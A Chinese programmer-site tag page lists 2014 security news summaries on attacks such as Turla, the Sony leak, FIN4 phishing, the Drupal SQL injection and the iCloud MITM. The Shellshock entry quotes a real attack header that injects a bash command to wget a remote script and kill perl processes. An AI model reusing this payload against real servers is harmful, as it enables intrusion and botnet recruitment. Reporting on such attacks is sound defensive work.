攻击_Tag标签_程序员俱乐部

中国优秀的程序员网站程序员频道CXYCLUB技术地图
最新资讯 | 百度新闻 | GOOGLE地图 | RSS订阅 | 更多
热搜:
更多>>
 
当前位置:程序员俱乐部 >>Tag标签 >> 攻击 >>列表
· 隐蔽Linux恶意木马被发现 已被用作攻击手段多年发布时间:2014-12-09
信息安全研究者近日发现了一种隐藏于Linux系统多年的极度隐蔽的木马程序,并显示其与Turla网络间谍攻击相关,已经被用来作为相关的网络攻击手段多年。八月,卡巴斯基和赛门铁克信息安全公司揭露了Turla网络间谍攻击的真面目,是一个多阶段的攻击行动,目标为政府机构、大使馆、军事组织、研究和教育组织以及制药企业,已知超过45个国家的上百个IP成为受害者。第一阶段的攻击使用了诸多零日漏洞进行攻击,第二阶段则部署后门进行攻击。Turla有着宽泛的攻击范围和复杂的攻击手段,全球化的高级攻击或将成为常态... 查看全文
· 保护移动应用免遭攻击的5个步骤发布时间:2014-12-05
英文原文:5StepstoProtectMobileAppsfromAttacks苹果CEO库克在公司的全球开发者大会上指出,注册的移动应用开发者已经超过了九百万,较去年增长了47%。有更多的个人把他们的技能和创新带到了这个行业,虽然这是值得激动的,但是开发者和新应用的猛增也带来了日益增长的恶意攻击的威胁。对于你们开发者而言,有必要熟悉最新的安全实践。这有助于你维护自己的声誉,让你把精力放在开发有创新的App上,而不是因疏忽所导致的、用户数据被连累的潜在事故上... 查看全文
· 新证据显示:索尼影业攻击致大量密码、安全证书泄露发布时间:2014-12-04
据外媒报道,当地时间12月3日,外媒thenextweb收到了一封来自黑客组织GOP的邮件。该组织称,索尼影业的网络攻击由他们发起。据了解,GOP在邮件中附上了大量压缩文件,当中包含了访问索尼影业服务器的安全证书、签名密钥、私有密钥及大量密码。在一个名为“密码”的文件下,存有大量的Excel表格,里面几乎有你可以想得到的所有系统的密码,例如电话系统、AMEX登入系统等等。而在一个名为“电脑密码”的文件下,存有用户登录索尼影业公司网站的登陆凭证... 查看全文
· 葛甲:福布斯恶毒攻击阿里该被告到关张发布时间:2014-12-04
昨晚看了福布斯一篇攻击阿里巴巴的文章,名为《中国网购节虚假销售:阿里巴巴有没有可持续的生意?China’sCyberMondayFakeSales:DoesAlibabaHaveASustainableBusiness?》。文章认为,在淘宝和天猫上销售的商家,付钱雇人从他们的商铺中买东西,然后再迅速退货回去,以便在未来的销售活动中提升自身权重,卖出更多高毛利货物。而这一做法,已对重视收入数字的中国投资界产生影响。文章称很多卖家热衷于在双11这天做这种事,因为当天交易多,不容易被发现... 查看全文
· 黑客组织专门对华尔街公司发动钓鱼攻击发布时间:2014-12-02
安全公司FireEye的研究人员发现了(PDF)一个熟知华尔街的黑客组织利用钓鱼攻击手段窃取了100多家公司的电子邮件账号,获得了有关企业并购等有价值的内幕信息。该组织被称为FIN4,利用的攻击手段很简单,其成员熟知企业财务和财富500强企业文化。他们因此能向针对性的目标发送钓鱼邮件窃取MicrosoftOutlook帐户的登录凭证,然后利用窃取到的帐户向其他公司成员发送钓鱼邮件。FIN4成员从100多家公司窃取到C级别高管,法律顾问,监管人员和科学家的帐户,其中80家公司是上市公司... 查看全文
· 黑客攻击学校官网:网页显示“表个白都不行啊”发布时间:2014-11-25
南都讯24日中午,河南商丘学院的官方网站疑似遭遇黑客攻击,网页显示“表个白都不行啊”、“总要有人为他说点什么”等黑体语句。随后,该网站彻底无法打开,当日15时许,该网站恢复。而就在数天前,该学院一名男生因为在学校当众表白引发一系列事件后遭到校方开除。事发后,众多网友在网上留言为男生纷纷打抱不平,认为学校过于苛责。根据微博@资讯商丘的截图和说明,24日上午到中午时分,商丘学院官网遭到黑客攻击,打开官网主页显示为:“表个白都不行啊... 查看全文
· iOS安全漏洞允许攻击者用恶意应用替换已安装的合法应用发布时间:2014-11-12
安全公司FireEye在其官方博客上警告,iOS设备的一个安全漏洞允许攻击者用恶意应用替换已安装的合法应用,窃取密码电子邮件等敏感数据。FireEye将这种攻击方式称为“面具攻击”(MasqueAttack),如果合法应用和恶意应用使用相同的包标识符,攻击者可以诱骗受害者安装具有欺骗性名字的应用如新愤怒小鸟,替换已经安装的愤怒小鸟。FireEye称,此类攻击可用于盗窃银行和邮件的登陆信息或其他敏感数据。“这是个很大的漏洞,很容易被利用,&rdquo... 查看全文
· Drupal警告SQL注入攻击发布时间:2014-11-01
开源CMS项目Drupal对最近修复的SQL注入漏洞发布了安全警告,称自动入侵工具已能利用该漏洞,如果Drupal7网站没有及时打上补丁都有可能遭到入侵。这里的及时是指在发布补丁7小时内,Drupal是在10月15日发布了修复补丁Drupal7.32,7小时后是UTC时间晚上11点,在此之后打上补丁可能就没有效果了,因为网站如果遭到入侵,升级到Drupal7.32并不能移除攻击者留下的后门。如果网站遭到入侵,攻击者能复制所有数据。... 查看全文
· 朝鲜好强!开发病毒游戏攻击韩国手机发布时间:2014-10-30
近日,韩国情报机关表示,有证据表明朝鲜通过带有病毒的手游,攻击了超过两万部韩国境内的手机。根据《韩国时报》报道,韩国国家情报院指出朝鲜把间谍软件伪装成了移动App,并把这些游戏的下载链接放上了韩国一些流量较高的网站上。至于这些游戏的名字,韩国并没有给出详细的名单,只表示目前这些App应用已经被删除。不过,nknews.org网站最近报道了一款由朝鲜开发的移动游戏,这款名叫《NicePigs》的游戏是由一名朝鲜公民开发的,此人生活在国外,并接受了相关IT培训。虽然还不知道这款游戏是否内置了病毒... 查看全文
· 攻击者利用Shellshock漏洞入侵邮件服务器发布时间:2014-10-29
攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:Message-ID:(){:;};wget-O/tmp/.legendhxxp://190-94-251-41/legend.txt;killall-9perl... 查看全文
· 张龙:国产操作系统每天遭受国外3万多次攻击发布时间:2014-10-28
10月28日中午消息,中国操作系统应用推广大会在京举行。国内操作系统厂商思普企业集团董事长张龙在会上表示,国产操作系统的发展经历过一段艰难的日子,曾经思普的服务器每天要遭到来自美国3万多次的攻击。而现在,他认为国产基础软件的春天已经来了。阻力与诱惑张龙向新浪科技表示,思普的桌面操作系统经历了10年的开发,而在这期间思普遇到了许多阻力。他提到,思普的服务器每天要受到来自美国3万多次的攻击,而这些攻击主要来自于操作系统领域强大的竞争对手。另外,在过去进行产品推广时,思普也屡屡吃&ldquo... 查看全文
· iCloud内地服务器遭攻击 用户数据或已外泄发布时间:2014-10-22
中新网10月22日电据华尔街日报中文网援引安全人士的话称,苹果公司在中国内地的iCloud服务受到攻击,攻击者可能截获并看到用户名、密码和其他个人数据。随后苹果在其官方发布声明称,iCloud服务器并未受损。外媒称,对于iCloud中国服务的担忧上周末开始出现,攻击来源无法确定。居住在台湾的中国互联网活跃人士周曙光测试发现,iCloud用户和iCloud服务器之间的通讯已经被攻击者使用“中间人”战术拦截。另外... 查看全文
· 国内iCloud服务器遭遇中间人攻击,中国苹果用户隐私不保发布时间:2014-10-20
iCloud.com使用akamai提供的CDN服务,有多个IP,目前至少发现了三个IP。https://23.48.140.239和https://23.13.186.46这两个iCloud服务器上没有被替换证书。但是直接访问https://23.59.94.46/,在台湾直接访问没有被替换证书,换苏州联通的VPN后,证书被替换为自签名的证书。并得到多位网友的证实(1、2)。这意味着iCloud服务器在中国被人使用SSL中间人劫持,中国苹果用户隐私不保。若有人不幸运被DNS服务器返回23... 查看全文
· Dropbox回应密码泄漏事件:称未遭黑客攻击发布时间:2014-10-15
美国云存储服务Dropbox周二表示,该服务没有遭到黑客攻击。此前网上出现的,被认为是Dropbox用户名和密码的文件并非来自Dropbox的服务器。本周一,一份文本文件被发布至Pastebin网站,而文件标题声称Dropbox遭到了攻击。这一文件本身包含被认为属于Dropbox的约400条电子邮件地址和密码,而黑客还掌握了近700万条电子邮件地址和密码,并表示只要用户为此捐献比特币,那么就将发布更多这些信息。这一消息在Twitter上迅速传播... 查看全文
· WordPress类网站更容易遭受黑客攻击发布时间:2014-10-14
根据咨询安全公司Imperva的研究调查显示,基于WordPress平台的博客网站更易遭受黑客攻击。采用WordPress平台的网站相较采用其他内容管理系统CMS平台的网站,遭受攻击的次数总体多出了24.1%(与其他CMS平台网站总和相比)。与采用其他CMS系统网站相比,WordPress网站发生跨站脚本攻击XSS事故多出60%几率,而且相比受攻击的类型更集中,每种类型都遭受更高的流量攻击。报告中指出,之所以Wordpress类网站更容易被攻击的一个主要原因是... 查看全文
· Microsoft账户疑似遇到SSL中间人攻击发布时间:2014-10-04
2014-10-2下午14点左右,发现无法登入microsoft账户。后在访问login.live.com发现证书错误,证书使用者和颁发者为:CN=hotmai.comO=hotmail.comC=cn有效期从‎2014‎年‎9‎月‎23‎日19:34:03到‎2015年‎9‎月‎23‎日19:34... 查看全文
· 那些即将被降维攻击改变的行业发布时间:2014-09-24
文/沈拓如果一个行业的价值,主要在于对于信息的处理与加工,那么这样的行业几乎发生颠覆性的变化。这是因为,如果一个行业的价值被绑定在信息处理与加工上,那么当移动互联网以及相应的云计算、大数据技术进入后,会在整体上替代原有行业的生产、分发与盈利方式,换言之,会使原有行业在新模式面前显得没有必要存在。其中有一些非常明显的,如图书出版、纸质媒体、电视机、电视内容制作、音像制品等行业将发生巨变。首先,从分发渠道上看,以往依赖于专用介质(纸张、音乐播放器、传统电视机)的信息分发机制,已经大量地被手机、PC... 查看全文
· jQuery.com 遭受恶意攻击,跳转到恶意网站发布时间:2014-09-24
jQuery.com是jQuery库的官方网站,该网站遭受恶意软件攻击,导致访问该网站时会重定向到一个包含RIG利用工具的网站,其中还包含盗取数据信息的恶意软件。关于此次攻击的详情请看:http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk... 查看全文
· FBI:越来越多员工攻击雇主网络窃取数据发布时间:2014-09-24
美国联邦调查局(FBI)和国土安全部本周表示,一些心怀不满的员工正越来越多地利用互联网云计算服务和其他计算机工具来攻击现任雇主和前雇主。在本周发布至政府网站的一份公共服务通知中,美国政府部门表示,许多员工正在利用Dropbox等云存储服务或其他互联网软件,远程接入公司网络,窃取商业机密和其他数据。由在职员工和前员工造成的损失可能达到5000至300万美元。不过这些政府部门没有公布具体有哪些公司受害。FBI对其中一些数据被窃事件展开了大规模调查。在某些事件中... 查看全文
· CSRF攻击与防御发布时间:2014-09-22
概述CSRF是CrossSiteRequestForgery的缩写,中文是跨站点请求伪造;接下来将和大家分享这种攻击的原理、实施的方法、以及防御的几种方案;CSRF攻击的原理通过在恶意网站部署好攻击代码和相关数据,然后引导目标网站的已经授权的用户进入恶意网站,由于浏览器已经获得了目标网站的用户授权票据,因此恶意网站就可以执行“事先”部署好的代码向目标网站提交数据使目标网站执行一些写的操作,比如删除目标网站的数据、向目标网站提交垃圾数据等,然而这个过程是在后台默默执行的... 查看全文

共12页首页上一页123456789101112下一页末页

最新文章
Java 添加、替换、删除Word中的图片
Java 添加..
ABAP和Java里的单例模式攻击
ABAP和Ja..

今日热点

推荐文章
android Canvas让我很困惑
android..
unable to find valid certification path to requested target 的简单解决办法
unable ..